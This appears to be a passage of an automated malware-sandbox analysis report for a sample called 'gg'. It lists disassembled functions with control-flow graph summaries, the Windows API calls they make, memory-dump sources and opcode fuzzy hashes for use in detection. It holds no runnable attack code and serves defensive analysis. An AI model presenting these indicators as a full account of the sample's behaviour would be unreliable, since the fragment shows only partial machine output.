                                                                                                                                                                                                                                                  control_flow_graph 647 2a2ae30-2a2ae3f 648 2a2ae41-2a2ae4e call 2a29838 647->648 649 2a2ae6b-2a2ae6f 647->649 656 2a2ae50 648->656 657 2a2ae64 648->657 650 2a2ae83-2a2aec4 649->650 651 2a2ae71-2a2ae7b 649->651 658 2a2aed1-2a2aedf 650->658 659 2a2aec6-2a2aece 650->659 651->650 704 2a2ae56 call 2a2b0b8 656->704 705 2a2ae56 call 2a2b0c8 656->705 657->649 660 2a2af03-2a2af05 658->660 661 2a2aee1-2a2aee6 658->661 659->658 663 2a2af08-2a2af0f 660->663 664 2a2aef1 661->664 665 2a2aee8-2a2aeef call 2a2a814 661->665 662 2a2ae5c-2a2ae5e 662->657 666 2a2afa0-2a2afb7 662->666 669 2a2af11-2a2af19 663->669 670 2a2af1c-2a2af23 663->670 667 2a2aef3-2a2af01 664->667 665->667 678 2a2afb9-2a2b018 666->678 667->663 669->670 671 2a2af30-2a2af39 call 2a2a824 670->671 672 2a2af25-2a2af2d 670->672 679 2a2af46-2a2af4b 671->679 680 2a2af3b-2a2af43 671->680 672->671 698 2a2b01a-2a2b060 678->698 681 2a2af69-2a2af76 679->681 682 2a2af4d-2a2af54 679->682 680->679 687 2a2af78-2a2af96 681->687 688 2a2af99-2a2af9f 681->688 682->681 684 2a2af56-2a2af66 call 2a2a834 call 2a2a844 682->684 684->681 687->688 699 2a2b062-2a2b065 698->699 700 2a2b068-2a2b093 GetModuleHandleW 698->700 699->700 701 2a2b095-2a2b09b 700->701 702 2a2b09c-2a2b0b0 700->702 701->702 704->662 705->662
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A2B086
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                  • Opcode ID: a3a86cd058524b34b8f4882dc1cbe22070ff6f45d399a2ace114d41bf26fa2a1
                                                                                                                                                                                                                                                  • Instruction ID: e012998002feb85dbe4fa325f8a18dbc7281c0cd1edef92a5b49cbf6489cf808
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3a86cd058524b34b8f4882dc1cbe22070ff6f45d399a2ace114d41bf26fa2a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E7114B0A00B158FD724DF29D18075ABBF2BF48704F00892ED48AD7A51DB75E94ACF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A24248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 706 2a24248-2a25a01 CreateActCtxA 709 2a25a03-2a25a09 706->709 710 2a25a0a-2a25a64 706->710 709->710 717 2a25a73-2a25a77 710->717 718 2a25a66-2a25a69 710->718 719 2a25a88-2a25ab8 717->719 720 2a25a79-2a25a85 717->720 718->717 724 2a25a6a 719->724 725 2a25aba-2a25b3c 719->725 720->719 724->717
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02A259F1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                                  • Opcode ID: 907e496ed445a0dee48d7320afa25473379a2e4ce73d3af8158ed52cbedd0158
                                                                                                                                                                                                                                                  • Instruction ID: a1ae16e201672396a6738876eeb4aab23d09afd48c7531bcb1b8d14486dfbb21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 907e496ed445a0dee48d7320afa25473379a2e4ce73d3af8158ed52cbedd0158
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B941D3B0D0062DCEDB24CFA9C884B9DBBB5FF44304F24809AD409AB255DB755949CF90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A25935 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 727 2a25935-2a25a01 CreateActCtxA 729 2a25a03-2a25a09 727->729 730 2a25a0a-2a25a64 727->730 729->730 737 2a25a73-2a25a77 730->737 738 2a25a66-2a25a69 730->738 739 2a25a88-2a25ab8 737->739 740 2a25a79-2a25a85 737->740 738->737 744 2a25a6a 739->744 745 2a25aba-2a25b3c 739->745 740->739 744->737
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02A259F1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                                  • Opcode ID: 9a53ee80eac519a0db2de1e94c02886476220b11681c2ac94d503529dd557b1d
                                                                                                                                                                                                                                                  • Instruction ID: 6e00d41866edd44ff01c0ce7cc2639d8865e6c4e85001dc449578c7c3a3d8caf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a53ee80eac519a0db2de1e94c02886476220b11681c2ac94d503529dd557b1d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7741E2B0D00229CEDB24CFA9C988B9EBBB5FF48304F24809AD408AB255DB755949CF90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A2D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 747 2a2d300-2a2d394 DuplicateHandle 748 2a2d396-2a2d39c 747->748 749 2a2d39d-2a2d3ba 747->749 748->749
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A2D387
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                                  • Opcode ID: f135e9012777cdaf201efa1d166800f5b6f9cd997cd08f94528bc627830e5bcb
                                                                                                                                                                                                                                                  • Instruction ID: 9129244d98f067f89c8233a3b828d04972dab89a900e16ac171a4ffb85fecce4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f135e9012777cdaf201efa1d166800f5b6f9cd997cd08f94528bc627830e5bcb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2721E2B59003189FDB10CFAAD984ADEBBF8FB48320F14805AE918A7350D374A944CFA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A2D2F9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 752 2a2d2f9-2a2d394 DuplicateHandle 753 2a2d396-2a2d39c 752->753 754 2a2d39d-2a2d3ba 752->754 753->754
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A2D387
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                                  • Opcode ID: 5194745a1198f6b75584990f0f5ab58d753dee4dbe98bdddd48c7fa2e45c164c
                                                                                                                                                                                                                                                  • Instruction ID: d78527f88d99d99cc0ea4223c24bf4e7c965ca64ee21bacc0f9364ca64614930
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5194745a1198f6b75584990f0f5ab58d753dee4dbe98bdddd48c7fa2e45c164c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F02112B59003189FDB10CFA9D584ADEBBF5FB48320F14845AE958A3310C338A944CFA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A2A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 757 2a2a870-2a2b2e8 759 2a2b2f0-2a2b31f LoadLibraryExW 757->759 760 2a2b2ea-2a2b2ed 757->760 761 2a2b321-2a2b327 759->761 762 2a2b328-2a2b345 759->762 760->759 761->762
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A2B101,00000800,00000000,00000000), ref: 02A2B312
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                  • Opcode ID: 6908036bfae961743a79bd75874015365b5fbb32adec655163c682ecf1be2e34
                                                                                                                                                                                                                                                  • Instruction ID: 4c01fd2e6c5f55aba8e9c861d7bb68812c5a3856cd7ce0178fc0fc35cbb6317c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6908036bfae961743a79bd75874015365b5fbb32adec655163c682ecf1be2e34
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D1114B69003598FCB20CF9AC544BDEFBF4EB48324F10846AD419A7210C775A544CFA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A2B2A0 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 765 2a2b2a0-2a2b2e8 766 2a2b2f0-2a2b31f LoadLibraryExW 765->766 767 2a2b2ea-2a2b2ed 765->767 768 2a2b321-2a2b327 766->768 769 2a2b328-2a2b345 766->769 767->766 768->769
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A2B101,00000800,00000000,00000000), ref: 02A2B312
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                  • Opcode ID: 96cc5a940e00510a72ed7456bd5e270a0798ad8be2ddd5aa37d9433bfeee0242
                                                                                                                                                                                                                                                  • Instruction ID: ff97850c330f0fcf8c0b829cf50e7c19aa42caa27c70fef63502a9090a9fdc39
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96cc5a940e00510a72ed7456bd5e270a0798ad8be2ddd5aa37d9433bfeee0242
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C1112B6D003198FCB10CF9AC584BDEFBF4EB48324F14842AD429A7650C374A545CFA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A2B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A2B086
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                  • Opcode ID: f3e3486e977beae025b8fa95a322669593f20184f7deb741c4b94c3612b1a27d
                                                                                                                                                                                                                                                  • Instruction ID: dfba25b0c7066472727d688742363488194f03f2a8a080f4abf1630ef00e3176
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3e3486e977beae025b8fa95a322669593f20184f7deb741c4b94c3612b1a27d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C110FB5D003598FCB20CF9AC444BDEFBF4EB88224F10842AD468A7210C375A549CFA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BCC18 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq
                                                                                                                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                                                                                                                  • Opcode ID: a80fe7e864d28320a3f874bea454fa2fcc8cb1d349877fa359576621d02e77a3
                                                                                                                                                                                                                                                  • Instruction ID: fd64375ce994b223e287e80e21b8fc15b115550bd087d0c7ba24f5615f7e616f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a80fe7e864d28320a3f874bea454fa2fcc8cb1d349877fa359576621d02e77a3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27417C74E012489FCB44DFA8D440AEEBFB2FF89310F108569E415A7390DB349A45CFA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BCC28 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq
                                                                                                                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                                                                                                                  • Opcode ID: 29ff908ef0f490342f5226a5c548909cf37e30460ead0e619049468cd2f32fb8
                                                                                                                                                                                                                                                  • Instruction ID: 11d9d83fad9c70cf699d7b97f2cec9701bcc77f30a165fa25eea5676ef11fc59
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29ff908ef0f490342f5226a5c548909cf37e30460ead0e619049468cd2f32fb8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C412874E402089FCB44DFA8D554AEEBBB2FF89310F108569E815A7350DB359A86CFA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BB328 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: 28ff4354670915e19fee808e5491b846f8edbd091eee798e1c0ad1320417bddf
                                                                                                                                                                                                                                                  • Instruction ID: b04a4f48b18f140ae24e27bb73209b159cd0e816924a2153c54c465a6adc8cd7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28ff4354670915e19fee808e5491b846f8edbd091eee798e1c0ad1320417bddf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A501D6706097849FC315AF7ED81404EBFB5EE8326131402AEC459D7262CE319D05C7A2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BBBE8 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 479aeb0a1e512808f1db5c58bc6ec99216c8823a2b0a0e39b9dc634f7224f8f8
                                                                                                                                                                                                                                                  • Instruction ID: cf83fc35e3511e7406f2e60b25121a822a7f31d8feb6c750d11b72d6d6c99219
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 479aeb0a1e512808f1db5c58bc6ec99216c8823a2b0a0e39b9dc634f7224f8f8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA613AB8E052589FDB04DFA8D8949CDBBB2FF8A310F1080AAE415AB365DB315C06CF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BBC38 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c25c98bfd80f7635f555fda9a1a6ec35f87649fc1fed724d9fc3b8990eaa8a5a
                                                                                                                                                                                                                                                  • Instruction ID: fae4bcac32bf2221a4b5c76519150bdbccbccdb7e02d531f0379c9bb78324ec6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c25c98bfd80f7635f555fda9a1a6ec35f87649fc1fed724d9fc3b8990eaa8a5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E451A778E00218DFDB04DFA9E99499DBBF2FF89310F109169E915AB364DB316846CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BD460 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7fc017efe6dfa212a7ca1d176852db3660731d2b126108b9e7d6b7e0fc3758b8
                                                                                                                                                                                                                                                  • Instruction ID: a84fcfd6626769535d985f24af36ced9b4dceb0bb3b7a67c673a78920123d948
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fc017efe6dfa212a7ca1d176852db3660731d2b126108b9e7d6b7e0fc3758b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC513774E002189FDB04DFA8D944AEEBBB2FF89301F109529E415B7391CB799A45CFA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BD458 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ccc2c707e0907e4ada7f021e2573da221491c33f0840b9eb12a5f1e793f18b47
                                                                                                                                                                                                                                                  • Instruction ID: d79759f1faffee749cd5b8b91676f538640a25ebb80b8fc2fd1ff9268705edc1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccc2c707e0907e4ada7f021e2573da221491c33f0840b9eb12a5f1e793f18b47
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66412574E002189FDB44DFA8D944AEEBBB2FF88301F109529E415B7391CB799A45CFA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BA9D0 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 664467713ef36d3e4bf3e701fb50854ee204100a93d7e724fa2b36d3ff4b987e
                                                                                                                                                                                                                                                  • Instruction ID: 265218160e8baa4db79cbfb7ebc5da71321dd7278c596431b22cd82785ea2015
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 664467713ef36d3e4bf3e701fb50854ee204100a93d7e724fa2b36d3ff4b987e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44416031E0021D9BDB15DFA5C980ADEBBF6FF88700F14912AE415B7240EB70A946CFA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BEA55 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 69ca0a06b2755209db13391c7330d3736629924c296d6ee7c138a84af653c7cc
                                                                                                                                                                                                                                                  • Instruction ID: 5f0bd71cbbb458ec2c827c551aa14166f633b2232ba1ab67631cca64495d5c4c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69ca0a06b2755209db13391c7330d3736629924c296d6ee7c138a84af653c7cc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5415974D04209DFDB50DF68C880AADFBB2FF45310F249698D449AB296CB31AC86CF81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0289D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1796889424.000000000289D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0289D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_289d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
